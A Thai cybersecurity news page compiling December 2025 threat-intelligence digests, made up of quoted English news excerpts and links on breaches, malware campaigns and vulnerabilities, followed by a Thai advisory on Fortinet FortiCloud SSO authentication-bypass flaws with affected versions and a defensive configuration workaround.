https://www.seqrite.com/blog/operation-moneymount-iso-deploying-phantom-stealer-via-iso-mounted-executables/
https://thehackernews.com/2025/12/phantom-stealer-spread-by-iso-phishing.html
https://www.infosecurity-magazine.com/news/russian-phishing-phantom-stealer/ - 8 Million Users' AI Conversations Sold For Profit By "Privacy" Extensions
"A few weeks ago, I was wrestling with a major life decision. Like I've grown used to doing, I opened Claude and started thinking out loud-laying out the options, weighing the tradeoffs, asking for perspective. Midway through the conversation, I paused. I realized how much I'd shared: not just this decision, but months of conversations-personal dilemmas, health questions, financial details, work frustrations, things I hadn't told anyone else. I'd developed a level of candor with my AI assistant that I don't have with most people in my life. And then an uncomfortable thought: what if someone was reading all of this?"
https://www.koi.ai/blog/urban-vpn-browser-extension-ai-conversations-data-collection
https://thehackernews.com/2025/12/featured-chrome-browser-extension.html - Amazon Threat Intelligence Identifies Russian Cyber Threat Group Targeting Western Critical Infrastructure
"As we conclude 2025, Amazon Threat Intelligence is sharing insights about a years-long Russian state-sponsored campaign that represents a significant evolution in critical infrastructure targeting: a tactical pivot where what appear to be misconfigured customer network edge devices became the primary initial access vector, while vulnerability exploitation activity declined. This tactical adaptation enables the same operational outcomes, credential harvesting, and lateral movement into victim organizations’ online services and infrastructure, while reducing the actor’s exposure and resource expenditure."
https://aws.amazon.com/blogs/security/amazon-threat-intelligence-identifies-russian-cyber-threat-group-targeting-western-critical-infrastructure/
https://www.theregister.com/2025/12/15/amazon_ongoing_gru_campaign/ - GOLD SALEM Tradecraft For Deploying Warlock Ransomware
"In mid-August 2025, Counter Threat Unit
(CTU) researchers identified the use of the legitimate Velociraptor digital forensics and incident response (DFIR) tool in likely ransomware precursor activity. Subsequent investigation and analysis of events in customer environments led CTU researchers to assess with high confidence that these incidents occurred with intent to deploy Warlock ransomware, which is operated by the GOLD SALEM cybercrime group."
https://news.sophos.com/en-us/2025/12/11/gold-salem-tradecraft-for-deploying-warlock-ransomware/
Breaches/Hacks/Leaks
- PornHub Extorted After Hackers Steal Premium Member Activity Data
"Adult video platform PornHub is being extorted by the ShinyHunters extortion gang after the search and watch history of its Premium members was reportedly stolen in a recent Mixpanel data breach. Last week, PornHub disclosed that it was impacted by a recent breach at analytics vendor Mixpanel. Mixpanel suffered a breach on November 8th, 2025, after an SMS phishing (smishing) attack enabled threat actors to compromise its systems. "A recent cybersecurity incident involving Mixpanel, a third-party data analytics provider, has impacted some Pornhub Premium users," reads a PornHub security notice posted on Friday."
https://www.bleepingcomputer.com/news/security/pornhub-extorted-after-hackers-steal-premium-member-activity-data/ - 700Credit Data Breach Impacts 5.8 Million Vehicle Dealership Customers
"700Credit, a U.S.-based financial services and fintech company, will start notifying more than 5.8 million people that their personal information has been exposed in a data breach incident. The cyberattack occurred after a threat actor had breached one of 700Credit's integration partners in July and discovered an API for obtaining customer information. However, the partner did not inform 700Credit of the compromise."
https://www.bleepingcomputer.com/news/security/700credit-data-breach-impacts-58-million-vehicle-dealership-customers/
https://therecord.media/data-breaches-affecting-20-million-prosper-700credit
https://www.securityweek.com/700credit-data-breach-impacts-5-8-million-individuals/
https://securityaffairs.com/185692/data-breach/u-s-fintech-and-data-services-firm-700credit-suffered-a-data-breach-impacting-at-least-5-6-million-people.html - Youth Sports, NCAA Insurance Claims Potentially Hacked
"A Maine-based third-party administrator that handles healthcare claims involving day care centers, youth sports and NCAA athlete accidents is notifying more than 181,000 claimants that their medical information and personal identifiers may have been accessed or stolen in an April hacking incident. National Accident Health General Agency, or NAHGA, describes itself as a third-party administrator that focuses on secondary accident insurance claims processing for clients across the country."
https://www.bankinfosecurity.com/youth-sports-ncaa-insurance-claims-potentially-hacked-a-30292 - Jaguar Land Rover Confirms Staff Data Stolen In Cyberattack
"British car manufacturer Jaguar Land Rover (JLR) has confirmed data belonging to current and former employees was compromised in a cyberattack that struck in August. The announcement is the first time the company has provided any details about the attack, which halted production for more than a month, ultimately leaving JLR short of more than $890 million."
https://therecord.media/jaguar-land-rover-confirms-staff-data-stolen-cyberattack
https://www.theregister.com/2025/12/15/jlr_payroll_data_stolen_in/ - SoundCloud Confirms Breach After Member Data Stolen, VPN Access Disrupted
"Audio streaming platform SoundCloud has confirmed that outages and VPN connection issues over the past few days were caused by a security breach in which threat actors stole a database containing user information. The disclosure follows widespread reports over the past four days from users who were unable to access SoundCloud when connecting via VPN, with attempts resulting in the site displaying 403 "forbidden" errors. In a statement shared with BleepingComputer, SoundCloud said it recently detected unauthorized activity involving an ancillary service dashboard and activated its incident response procedures."
https://www.bleepingcomputer.com/news/security/soundcloud-confirms-breach-after-member-data-stolen-vpn-access-disrupted/
General News
- Europe’s DMA Raises New Security Worries For Mobile Ecosystems
"Mobile security has long depended on tight control over how apps and services interact with a device. A new paper from the Center for Cybersecurity Policy and Law warns that this control may weaken as the European Union’s Digital Markets Act pushes mobile platforms to open core functions to outside developers. The report explains that the DMA requires large platform providers to support free interoperability with mobile hardware and software features that sit deep in the operating system. These internal functions were never designed for open access. This single requirement introduces a set of risks that grow as more system components are exposed."
https://www.helpnetsecurity.com/2025/12/15/eu-dma-mobile-security-risks/
https://cdn.prod.website-files.com/660ab0cd271a25abeb800460/692f22683cc0c02728db52bb_Europe_DMA_All_120325.pdf - How Researchers Are Teaching AI Agents To Ask For Permission The Right Way
"People are starting to hand more decisions to AI agents, from booking trips to sorting digital files. The idea sounds simple. Tell the agent what you want, then let it work through the steps. The hard part is what the agent does with personal data along the way. A new research study digs into this problem, and asks a basic question. How should an AI agent know when to use someone’s data without asking every time?"
https://www.helpnetsecurity.com/2025/12/15/research-ai-agent-permissions/
https://arxiv.org/pdf/2511.17959 - From Fake Deals To Phishing: The Most Effective Christmas Scams Of 2025
"As the season of giving unfolds, cyber criminals are taking advantage of holiday stress and speed. In 2025, scams are not only more common, they’re powered by AI and automation, making them harder to spot. Researchers at Check Point detected 33,502 Christmas-themed phishing emails in the past two weeks alone, along with more than 10,000 fake advertisements being created daily on social media channels. Many mimic festive promotions, while others push fake Walmart or Home Depot deals, fraudulent charity appeals, and urgent delivery notices."
https://blog.checkpoint.com/research/from-fake-deals-to-phishing-the-most-effective-christmas-scams-of-2025/ - Think Like An Attacker: Cybersecurity Tips From Cato Networks' CISO
"Welcome to Dark Reading's Heard it From a CISO video series, which offers advice on breaking into and advancing within the cybersecurity field from those who have been there. Cybersecurity is a field that touches every aspect of modern life, from personal privacy to global business operations. In Dark Reading's latest episode, Etay Mayor, chief security strategist at Cato Networks and professor at Boston College, shares his journey, expertise, and advice for those interested in entering this ever-evolving domain."
https://www.darkreading.com/cybersecurity-operations/cybersecurity-tips-cato-networks-ciso - The 2025 Cloudflare Radar Year In Review: The Rise Of AI, Post-Quantum, And Record-Breaking DDoS Attacks
"The 2025 Cloudflare Radar Year in Review is here: our sixth annual review of the Internet trends and patterns we observed throughout the year, based on Cloudflare’s expansive network view. Our view is unique, due to Cloudflare’s global network, which has a presence in 330 cities in over 125 countries/regions, handling over 81 million HTTP requests per second on average, with more than 129 million HTTP requests per second at peak on behalf of millions of customer Web properties, in addition to responding to approximately 67 million (authoritative + resolver) DNS queries per second."
https://blog.cloudflare.com/radar-2025-year-in-review/
https://www.helpnetsecurity.com/2025/12/15/cloudflare-internet-trends-2025/ - Militant Groups Are Experimenting With AI, And The Risks Are Expected To Grow
"As the rest of the world rushes to harness the power of artificial intelligence, militant groups also are experimenting with the technology, even if they aren’t sure exactly what to do with it. For extremist organizations, AI could be a powerful tool for recruiting new members, churning out realistic deepfake images and refining their cyberattacks, national security experts and spy agencies have warned. Someone posting on a pro-Islamic State group website last month urged other IS supporters to make AI part of their operations. “One of the best things about AI is how easy it is to use,” the user wrote in English."
https://www.securityweek.com/militant-groups-are-experimenting-with-ai-and-the-risks-are-expected-to-grow/ - Analyzing Partially Encrypted Network Flows With Mid-Encryption
"Encrypted traffic has come to dominate network flows, which makes it difficult for traditional flow monitoring tools to maintain visibility. This is particularly true when the process to enable encryption occurs after an initial data exchange, causing the encryption attributes to be missed. In this blog post we take a closer look at a new feature added to CERT’s Yet Another Flowmeter tool (YAF) to capture the attributes of encryption when it occurs after the start of the session. We call this mid-encryption. We explore what mid-encryption means, why it matters, how it works within YAF, and what benefits this brings to traffic analysis and network security teams."
https://www.sei.cmu.edu/blog/analyzing-partially-encrypted-network-flows-with-mid-encryption/ - The 2025 ITRC Consumer Impact Report: A New Era Of Identity Crime
"Founded in 1999, the Identity Theft Resource Center (ITRC) is a national nonprofit dedicated to empowering and guiding consumers, victims, businesses and government agencies to minimize risk and mitigate the impact of identity compromise and crime. The ITRC provides free victim assistance and consumer education through its website, live chat and toll-free phone support. It also tracks data breaches and offers resources for both individuals and businesses to stay informed and protected, including an annual report on the previous year’s trends in identity theft and data breaches. The 2025 ITRC Consumer Impact Report was published recently, and its tone is markedly more urgent than previous years’ reports."
https://blog.barracuda.com/2025/12/15/2025-irtc-consumer-impact-report-new-era-identity-crime
https://www.idtheftcenter.org/publication/itrc-2025-consumer-impact-report/ - Third DraftKings Hacker Pleads Guilty
"Nathan Austad is the third individual to plead guilty to launching a credential stuffing attack against a fantasy sports and betting website, the DoJ announced. Austad, 21, of Farmington, Minnesota, also known as ‘Snoopy’, admitted in court to his role in a scheme to hack thousands of user accounts and sell access to them to drain their funds. According to documents and statements presented in court, Austad and his co-conspirators compromised over 60,000 user accounts at the betting website."
https://www.securityweek.com/third-draftkings-hacker-pleads-guilty/ - CERT-FR Recommends Completely Deactivate Wi-Fi Whenever It’s Not In Use
"The CERT-FR (French Computer Emergency Response Team) is advising iPhone and Android users to fully disable Wi-Fi to reduce risk. CERT-FR warns iPhone and Android users to fully disable Wi-Fi to reduce exposure, citing multiple vulnerabilities across wireless interfaces, apps, OSs, and even hardware. The agency reiterates basic hygiene: install apps only from official stores, review permissions, keep devices updated and rebooted, use a VPN on public Wi-Fi, and disable auto-join on open networks."
https://securityaffairs.com/185702/hacking/cert-fr-recommends-completely-deactivate-wi-fi-whenever-its-not-in-use.html - The Budget Effect Of a Security Incident
"As sophisticated cyber-attacks increasingly target SaaS data, both vendors and customers are pushing to increase investments in SaaS security. Vendors are dedicating substantial resources to product development, incident communication and customer outreach. Simultaneously, many customers are elevating SaaS security conversations to their CISOs and Information Security (InfoSec) teams. Others are still considering their options and their risk appetites."
https://www.infosecurity-magazine.com/blogs/the-budget-effect-of-a-security/
อ้างอิง
Electronic Transactions Development Agency (ETDA)
- Prometheus: Open-Source Metrics And Monitoring Systems And Services
-
Cyber Threat Intelligence 15 December 2025โพสต์ใน Cyber Security News
Financial Sector
- Money Mules Require Banks To Switch From Defense To Offense
"QUESTION: How can security and fraud teams identify money mules? Jonathan Frost, director of global advisory for EMEA, BioCatch: The Financial Conduct Authority's (FCA) review of the UK's National Fraud Database (NFD) revealed 194,000 money mule accounts were offboarded between January 2022 and September 2023. Only 37% of mules were reported to the NFD (operated by Cifas) last year."
https://www.darkreading.com/threat-intelligence/money-mules-require-banks-to-switch-from-defense-to-offense
Telecom Sector
- Uneven Regulatory Demands Expose Gaps In Mobile Security
"Mobile networks carry a great deal of the world’s digital activity, which makes operators a frequent target for attacks. A study released by the GSMA shows that operators spend between $15 and $19 billion a year on core cybersecurity functions. Spending could reach more than $40 billion by 2030. These figures do not include expenses tied to resilience, training, or governance. Security teams face attack volumes that exceed anything planned for a decade ago. Some operators record billions of attempts each year to scan for weaknesses or push malicious traffic into their networks. Outages linked to denial of service attacks remain common, and attempts to gain unauthorized access continue to rise."
https://www.helpnetsecurity.com/2025/12/12/gsma-mobile-network-security-pressures-report/
Vulnerabilities
- Apple Fixes Two Zero-Day Flaws Exploited In 'sophisticated' Attacks
"Apple has released emergency updates to patch two zero-day vulnerabilities that were exploited in an “extremely sophisticated attack” targeting specific individuals. The zero-days are tracked as CVE-2025-43529 and CVE-2025-14174 and were both issued in response to the same reported exploitation. "Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 26," reads Apple's security bulletin."
https://www.bleepingcomputer.com/news/security/apple-fixes-two-zero-day-flaws-exploited-in-sophisticated-attacks/
https://support.apple.com/en-us/125884
https://thehackernews.com/2025/12/apple-issues-security-updates-after-two.html
https://securityaffairs.com/185628/hacking/emergency-fixes-deployed-by-google-and-apple-after-targeted-attacks.html - New React RSC Vulnerabilities Enable DoS And Source Code Exposure
"The React team has released fixes for two new types of flaws in React Server Components (RSC) that, if successfully exploited, could result in denial-of-service (DoS) or source code exposure. The team said the issues were found by the security community while attempting to exploit the patches released for CVE-2025-55182 (CVSS score: 10.0), a critical bug in RSC that has since been weaponized in the wild."
https://thehackernews.com/2025/12/new-react-rsc-vulnerabilities-enable.html
https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components
https://www.theregister.com/2025/12/12/new_react_secretleak_bugs/ - React2Shell Exploitation Escalates Into Large-Scale Global Attacks, Forcing Emergency Mitigation
"The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has urged federal agencies to patch the recent React2Shell vulnerability by December 12, 2025, amid reports of widespread exploitation. The critical vulnerability, tracked as CVE-2025-55182 (CVSS score: 10.0), affects the React Server Components (RSC) Flight protocol. The underlying cause of the issue is an unsafe deserialization that allows an attacker to inject malicious logic that the server executes in a privileged context. It also affects other frameworks, including Next.js, Waku, Vite, React Router, and RedwoodSDK."
https://thehackernews.com/2025/12/react2shell-exploitation-escalates-into.html - Free Micropatches For Windows Remote Access Connection Manager DoS (0day)
"During our investigation of CVE-2025-59230, a Windows Remote Access Connection Manager elevation of privilege vulnerability that was patched by Microsoft with October 2025 Windows updates, we found an exploit for it that nicely demonstrated local arbitrary code execution as Local System when launched as a non-admin Windows user. Interestingly though, this exploit - while exploiting CVE-2025-59230 - also included an exploit for another vulnerability that turned out to have remained unpatched to this day. Let's take a closer look."
https://blog.0patch.com/2025/12/free-micropatches-for-windows-remote.html
https://www.bleepingcomputer.com/news/microsoft/new-windows-rasman-zero-day-flaw-gets-free-unofficial-patches/
https://www.theregister.com/2025/12/12/microsoft_windows_rasman_dos_0day/ - CISA Adds One Known Exploited Vulnerability To Catalog
"CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
CVE-2018-4063 Sierra Wireless AirLink ALEOS Unrestricted Upload of File with Dangerous Type Vulnerability"
https://www.cisa.gov/news-events/alerts/2025/12/12/cisa-adds-one-known-exploited-vulnerability-catalog
https://thehackernews.com/2025/12/cisa-adds-actively-exploited-sierra.html
https://securityaffairs.com/185639/security/u-s-cisa-adds-google-chromium-and-sierra-wireless-airlink-aleos-flaws-to-its-known-exploited-vulnerabilities-catalog.html
Malware
- Fake ‘One Battle After Another’ Torrent Hides Malware In Subtitles
"A fake torrent for Leonardo DiCaprio’s 'One Battle After Another' hides malicious PowerShell malware loaders inside subtitle files that ultimately infect devices with the Agent Tesla RAT malware. The malicious torrent file was discovered by Bitdefender researchers while investigating a spike in detections related to the movie. One Battle After Another is a highly rated Paul Thomas Anderson movie released on September 26, 2025, starring Leonardo DiCaprio, Sean Penn, and Benicio del Toro."
https://www.bleepingcomputer.com/news/security/fake-one-battle-after-another-torrent-hides-malware-in-subtitles/ - PyStoreRAT: A New AI-Driven Supply Chain Malware Campaign Targeting IT & OSINT Professionals
"Over the last several months, dormant GitHub accounts, some inactive for years, suddenly reactivated and began publishing polished, AI-generated projects that included OSINT tools, DeFi bots, GPT wrappers, and security-themed utilities. Several of these repositories climbed into GitHub’s top trending lists, placing them directly in front of IT administrators, cybersecurity analysts, and OSINT professionals. Only after some of these repositories gained traction did attackers introduce subtle “maintenance” commits that deployed a previously undocumented JavaScript/HTA backdoor Morphisec researchers have coined “PyStoreRAT’."
https://www.morphisec.com/blog/pystorerat-a-new-ai-driven-supply-chain-malware-campaign-targeting-it-osint-professionals/
https://thehackernews.com/2025/12/fake-osint-and-gpt-utility-github-repos.html
https://hackread.com/pystorerat-rat-malware-github-osint-researchers/ - Oyster Backdoor Resurfaces: Analyzing The Latest SEO Poisoning Attacks
"CyberProof Threat Hunters and Intel Analysts continue to see a new wave of SEO poisoning, that they noticed starting in mid-November 2025, delivering Oyster backdoor tricking users to download malicious office meeting software files like Microsoft teams and Google meet. The samples reviewed were recently compiled and using new infrastructure and difference certificates which were not reported before, however revoked now. We quickly stumbled upon a blog post by Rapid7 researchers in June that shared insights on Oyster backdoor using similar file names but different certificates."
https://www.cyberproof.com/blog/oyster-backdoor-resurfaces-analyzing-the-latest-seo-poisoning-attacks/
https://hackread.com/fake-microsoft-teams-google-meet-download-oyster-backdoor/ - Following The Digital Trail: What Happens To Data Stolen In a Phishing Attack
"A typical phishing attack involves a user clicking a fraudulent link and entering their credentials on a scam website. However, the attack is far from over at that point. The moment the confidential information falls into the hands of cybercriminals, it immediately transforms into a commodity and enters the shadow market conveyor belt. In this article, we trace the path of the stolen data, starting from its collection through various tools – such as Telegram bots and advanced administration panels – to the sale of that data and its subsequent reuse in new attacks. We examine how a once leaked username and password become part of a massive digital dossier and why cybercriminals can leverage even old leaks for targeted attacks, sometimes years after the initial data breach."
https://securelist.com/what-happens-to-stolen-data-after-phishing-attacks/118180/ - Technical Analysis Of The BlackForce Phishing Kit
"Zscaler ThreatLabz identified a new phishing kit named BlackForce, which was first observed in the beginning of August 2025 with at least five distinct versions. BlackForce is capable of stealing credentials and performing Man-in-the-Browser (MitB) attacks to steal one-time tokens and bypass multi-factor authentication (MFA). The phishing kit is actively marketed and sold on Telegram forums for €200–€300."
https://www.zscaler.com/blogs/security-research/technical-analysis-blackforce-phishing-kit
https://thehackernews.com/2025/12/new-advanced-phishing-kits-use-ai-and.html - Investigating An Adversary-In-The-Middle Phishing Campaign Targeting Microsoft 365 And Okta Users
"Datadog has identified an active phishing campaign that targets organizations that use Microsoft 365 and Okta for their single sign-on (SSO) and is able to hijack the legitimate SSO flow. In this post, we provide our analysis of the techniques this campaign uses and share indicators of compromise you can check for in your Okta and Microsoft 365 logs."
https://securitylabs.datadoghq.com/articles/investigating-an-aitm-phishing-campaign-m365-okta/ - Chinese APT Targets Uzbekistan
"In November, TG Soft's Anti-Malware Research Center (C.R.A.M) identified a cyber-espionage campaign targeting government agencies in Uzbekistan. Since the initial campaign identified on November 12, two other campaigns have been found that can be associated with the same threat actor."
https://www.tgsoft.it/news/news_archivio.asp?id=1693 - Beware: PayPal Subscriptions Abused To Send Fake Purchase Emails
"An email scam is abusing abusing PayPal’s "Subscriptions" billing feature to send legitimate PayPal emails that contain fake purchase notifications embedded in the Customer service URL field. Over the past couple of months, people have reported [1, 2] receiving emails from PayPal stating, "Your automatic payment is no longer active." The email includes a customer service URL field that was somehow modified to include a message stating that you purchased an expensive item, such as a Sony device, MacBook, or iPhone."
https://www.bleepingcomputer.com/news/security/beware-paypal-subscriptions-abused-to-send-fake-purchase-emails/
Breaches/Hacks/Leaks
- Fieldtex Data Breach Impacts 238,000
"Fieldtex Products, a US company that provides contract sewing and medical supply fulfillment services, has disclosed a data breach after it was targeted by a notorious ransomware group. In a data security incident notice posted on its website on November 20, Fieldtex said it detected unauthorized access to its systems in mid-August. An investigation showed that hackers may have gained access to “a limited amount of protected health information”."
https://www.securityweek.com/fieldtex-data-breach-impacts-238000/
https://www.bankinfosecurity.com/fieldtex-trizetto-reveal-new-healthcare-breaches-a-30280 - 4B+ Records, Including Numerous LinkedIn Profiles, Exposed In One Of The Largest Lead-Generation Datasets Ever Found Open
"While massive contact databases can be a significant time-saver for businesses, they also have a major drawback – security. If left unprotected, a single exposed dataset can endanger the privacy of millions of users. That’s exactly what the Cybernews research team discovered in a recent major data leak. The team found an unprotected MongoDB instance containing a staggering 16.14 terabytes of professional and corporate intelligence data. In total, researchers discovered nearly 4.3 billion documents, making it one of the largest lead-generation datasets to have ever leaked."
Priority: 3 - Important
Relevance: General
https://cybernews.com/security/database-exposes-billions-records-linkedin-data/
https://securityaffairs.com/185661/data-breach/experts-found-an-unsecured-16tb-database-containing-4-3b-professional-records.html
General News
- The CISO-COO Partnership: Protecting Operational Excellence
"At first glance, the chief information security officer and chief operating officer appear to operate in fundamentally different worlds — perhaps even at odds with one another. While the CISO is preoccupied with threat vectors, vulnerabilities and intrusions; the COO obsesses over margins, uptime, and efficiency. However, the digitally transformed enterprise demands CISOs and COOs build strong, intentional partnerships."
https://www.darkreading.com/cybersecurity-operations/the-ciso-coo-partnership-protecting-operational-excellence - Vibe Coding: Innovation Demands Vigilance
"The hype surrounding AI in software development is undeniable. We are witnessing a paradigm shift, where "vibe coding" — expressing intent in natural language and leveraging AI large language models (LLMs) or agents to generate and refine code — is rapidly gaining traction. This approach promises unprecedented speed, lower barriers to entry, and accelerated prototyping. Yet, as a cybersecurity professional, I see a critical caveat: vibe coding's velocity often comes at the expense of the controls that safeguard our digital infrastructure."
https://www.darkreading.com/application-security/vibe-coding-innovation-demands-vigilance - Supply Chain Attacks Targeting GitHub Actions Increased In 2025
"Some of the most significant software supply chain incidents over the past year were carried out by threat actors who exploited vulnerabilities in GitHub, the global repository widely used by software developers to host and collaboratively maintain code. Major supply chain attacks, such as Ultralytics, Singularity, Shibaud/Shai-Hulud, and GitHub Action tj-actions/changed-files, are among those in which threat actors compromised GitHub Actions, the continuous integration and continuous delivery capability in GitHub that lets developers automate software development workflows."
https://www.darkreading.com/application-security/supply-chain-attacks-targeting-github-actions-increased-in-2025 - Your Updated Guide To AI In Cybersecurity: Adoption, Trends, Challenges, And The Future
"The influence of AI in various areas of commerce is much larger than what was initially anticipated. AI isn’t just seen as a force multiplier; it’s the new age of business where organizations are betting on its potential even to wipe out certain workforces. Would it be the reality of work? Only time will tell. Soon. However, it is certain that AI is proving to be a worthy companion, making teams more efficient, automating redundant tasks, managing data, systems, and processes, and even narrowing the skill gap between, say, a new security analyst and an experienced one, thereby reducing overheads and operational hiccups."
https://www.group-ib.com/blog/ai-cybersecurity-guide-2025/ - What 35 Years Of Privacy Law Say About The State Of Data Protection
"Privacy laws have expanded around the world, and security leaders now work within a crowded field of requirements. New research shows that these laws provide stronger rights and duties, but the protections do not always translate into reductions in harm. The study looks at thirty five years of privacy history, from the rise of early data protection efforts to the current landscape of AI driven risk, cross border transfers, and uneven enforcement."
https://www.helpnetsecurity.com/2025/12/12/global-privacy-enforcement-trends-research/
https://www.mdpi.com/2624-800X/5/4/103 - LLM Privacy Policies Keep Getting Longer, Denser, And Nearly Impossible To Decode
"People expect privacy policies to explain what happens to their data. What users get instead is a growing wall of text that feels harder to read each year. In a new study, researchers reviewed privacy policies for LLMs and traced how they changed. Researchers looked at privacy policies from 11 providers and tracked 74 versions over several years. The average policy reached about 3,346 words, which is about 53 percent longer than the average for general software policies published in 2019."
https://www.helpnetsecurity.com/2025/12/12/llms-privacy-policies-study/
https://arxiv.org/pdf/2511.21758 - Ransomware Keeps Widening Its Reach
"Ransomware keeps shifting into new territory, pulling in victims from sectors and regions that once saw fewer attacks. The latest Global Threat Briefing for H2 2025 from CyberCube shows incidents spreading in ways that make it harder for security leaders to predict where threats will rise next. Researchers evaluated incident patterns, sector level exposure and signals drawn from threat actor behavior. Their aim was to map where ransomware is spreading, which organizations sit in higher risk clusters and how security posture shapes exposure."
https://www.helpnetsecurity.com/2025/12/12/global-ransomware-trends-2025/ - Turn Me On, Turn Me Off: Zigbee Assessment In Industrial Environments
"We all encounter IoT and home automation in some form or another, from smart speakers to automated sensors that control water pumps. These services appear simple and straightforward to us, but many devices and protocols work together under the hood to deliver them. One of those protocols is Zigbee. Zigbee is a low-power wireless protocol (based on IEEE 802.15.4) used by many smart devices to talk to each other. It’s common in homes, but is also used in industrial environments where hundreds or thousands of sensors may coordinate to support a process."
https://securelist.com/zigbee-protocol-security-assessment/118373/ - Nevada Ransomware Attack Offers Lessons In Statewide Cyber Resilience
"In August 2025, Nevada state government systems suddenly went offline. What initially appeared to be a routine outage turned out to be a full-scale ransomware attack affecting more than 60 state agencies—including Department of Motor Vechiles (DMV) systems, social services, law enforcement, state payroll, and more. Some systems remained offline for 28 days."
https://blog.barracuda.com/2025/12/11/nevada-ransomware-attack-offers-lessons-in-statewide-cyber-resil - Locks, SOCs And a Cat In a Box: What Schrödinger Can Teach Us About Cybersecurity
"I recently had, what I thought, was a unique brainwave. (Spoiler alert: it wasn’t, but please read on!) As a marketing leader at ESET UK, part of my role is to communicate how our powerful and comprehensive solutions can be implemented to protect organisations, in a way that helps clarify the case for upgrading to higher levels of cybersecurity. And that need for clarity is now more urgent than ever."
https://www.welivesecurity.com/en/business-security/locks-socs-cat-box-what-schrodinger-can-teach-us-about-cybersecurity/ - France And Germany Grappling With Nation-State Hacks
"The French Ministry of Interior is investigating a suspected nation-state cyberattack that targeted its email server. Additionally, the German government on Friday attributed a 2024 hacking incident on air traffic control systems to Russian nation-state hackers. French Interior Minister Laurent Nuñez told French outlet RTL it's uncertain whether hackers stole files. Details of the hack are sparse, but the minister said the attack could be "foreign interference.""
https://www.bankinfosecurity.com/france-germany-grappling-nation-state-hacks-a-30282
อ้างอิง
Electronic Transactions Development Agency (ETDA)
- Money Mules Require Banks To Switch From Defense To Offense
-
📢 วิกฤต Fortinet: ช่องโหว่ Critical เปิดทางแฮกเกอร์ข้าม Login ควบคุมอุปกรณ์ผ่าน FortiCloud SSO‼️โพสต์ใน Cyber Security News
Fortinet ออกประกาศเตือนช่องโหว่ความรุนแรงระดับ Critical ในกระบวนการยืนยันตัวตนผ่าน FortiCloud SSO (SAML-based Authentication)
ช่องโหว่นี้ทำให้ผู้โจมตีที่ ไม่ได้รับการยืนยันตัวตน สามารถ ข้ามขั้นตอนการ Login ของผู้ดูแลระบบ (Admin Authentication Bypass) และเข้าควบคุมอุปกรณ์ได้
อุปกรณ์ที่เปิดใช้ FortiCloud SSO และมี Management Interface เข้าถึงได้จาก Internet มีความเสี่ยงสูงมากสรุปภาพรวม (Overview)Fortinet ได้เผยแพร่การอัปเดตความปลอดภัยเพื่อแก้ไขช่องโหว่วิกฤต 2 รายการ ได้แก่
CVE-2025-59718, CVE-2025-59719 | CVSS 9.8 (Critical)
ช่องโหว่ดังกล่าวส่งผลต่อกระบวนการยืนยันตัวตนแบบ FortiCloud SSO (SAML-based authentication) เนื่องจากมีการตรวจสอบลายเซ็นดิจิทัลของ SAML Response
ไม่ถูกต้อง (Improper Cryptographic Signature Verification)
ผลที่เกิดขึ้นคือ ผู้โจมตีที่ไม่ได้รับการยืนยันตัวตนสามารถ Bypass การ Login ของผู้ดูแลระบบ (Admin Authentication Bypass) ได้
รายละเอียดช่องโหว่ (Vulnerability Details)
CVE-2025-59718
•ผลิตภัณฑ์ที่ได้รับผลกระทบ:- FortiOS
- FortiProxy
- FortiSwitchManager
•ประเภทช่องโหว่: Improper Verification of Cryptographic Signature
•รายละเอียดทางเทคนิค: ระบบตรวจสอบ SAML Response จาก FortiCloud SSO ไม่ถูกต้อง ทำให้สามารถใช้ SAML Message ที่ถูกปลอมแปลงเพื่อผ่านการยืนยันตัวตนได้
•ผลกระทบ: Bypass Admin Authentication โดยไม่ต้องใช้ Credentials
CVE-2025-59719
•ผลิตภัณฑ์ที่ได้รับผลกระทบ:FortiWeb
•ประเภทช่องโหว่: Improper Verification of Cryptographic Signature
•รายละเอียดทางเทคนิค: การตรวจสอบลายเซ็น SAML ไม่รัดกุม ทำให้ผู้โจมตีสามารถปลอมแปลง SAML Response เพื่อเข้าสู่ระบบผู้ดูแลได้
•ผลกระทบ: Unauthenticated Admin Access
ผลกระทบทางเทคนิค (Technical Impact)
หากถูกโจมตีสำเร็จ อาจส่งผลกระทบดังต่อไปนี้:
•ข้ามขั้นตอนการยืนยันตัวตนผู้ดูแลระบบ (Admin Authentication Bypass)
•เข้าควบคุมอุปกรณ์ Fortinet โดยไม่ได้รับอนุญาต
•เปลี่ยนแปลงหรือทำลาย Configuration
•สร้างบัญชี Admin เพิ่มโดยไม่ทราบที่มา
•เป็นจุดเริ่มต้นของการโจมตีภายในเครือข่าย (Lateral Movement)
️ ความเสี่ยงสูงมากหาก Management Interface เปิดให้เข้าถึงจาก Internet
เวอร์ชันที่ได้รับผลกระทบ (Affected Versions)
FortiOS
•7.0.0 – 7.0.17
•7.2.0 – 7.2.11
•7.4.0 – 7.4.8
•7.6.0 – 7.6.3
FortiProxy
•7.0.0 – 7.0.21
•7.2.0 – 7.2.14
•7.4.0 – 7.4.10
•7.6.0 – 7.6.3
FortiSwitchManager
•7.0.0 – 7.0.5
•7.2.0 – 7.2.6
FortiWeb
•7.4.0 – 7.4.9
•7.6.0 – 7.6.4
•8.0.0
แนวทางแก้ไข (Mitigation – Recommended)
️
1️⃣ แนวทางที่แนะนำ (Priority)
•อัปเกรด Firmware ของอุปกรณ์ที่ได้รับผลกระทบเป็นเวอร์ชันล่าสุดทันที
•ตรวจสอบว่าอุปกรณ์ใดมีการเปิดใช้ FortiCloud SSO2️⃣ แนวทางแก้ไขชั่วคราว (Workaround)
หากไม่สามารถอัปเกรดได้ทันที ให้ดำเนินการดังนี้:
ปิด FortiCloud SSO สำหรับ Admin Login
ผ่าน GUI
•ไปที่ System → Settings
•ปิด Allow administrative login using FortiCloud SSO
ผ่าน CLI
config system global
set admin-forticloud-sso-login disable
end
หมายเหตุ: เป็นเพียงการลดความเสี่ยงชั่วคราว ไม่ใช่การแก้ไขถาวร
คำแนะนำด้านความปลอดภัยเพิ่มเติม (Security Hardening)
️
•จำกัดการเข้าถึง Management Interface ด้วย IP Allowlist
•ตรวจสอบ Log:- Admin Login
- FortiCloud / SAML Authentication
•ตรวจสอบการสร้าง Admin Account ใหม่ที่ผิดปกติ
•เปิดใช้งาน MFA สำหรับบัญชีผู้ดูแลระบบ
•ตรวจสอบ Configuration Backup ว่ามีการเปลี่ยนแปลงผิดปกติหรือไม่
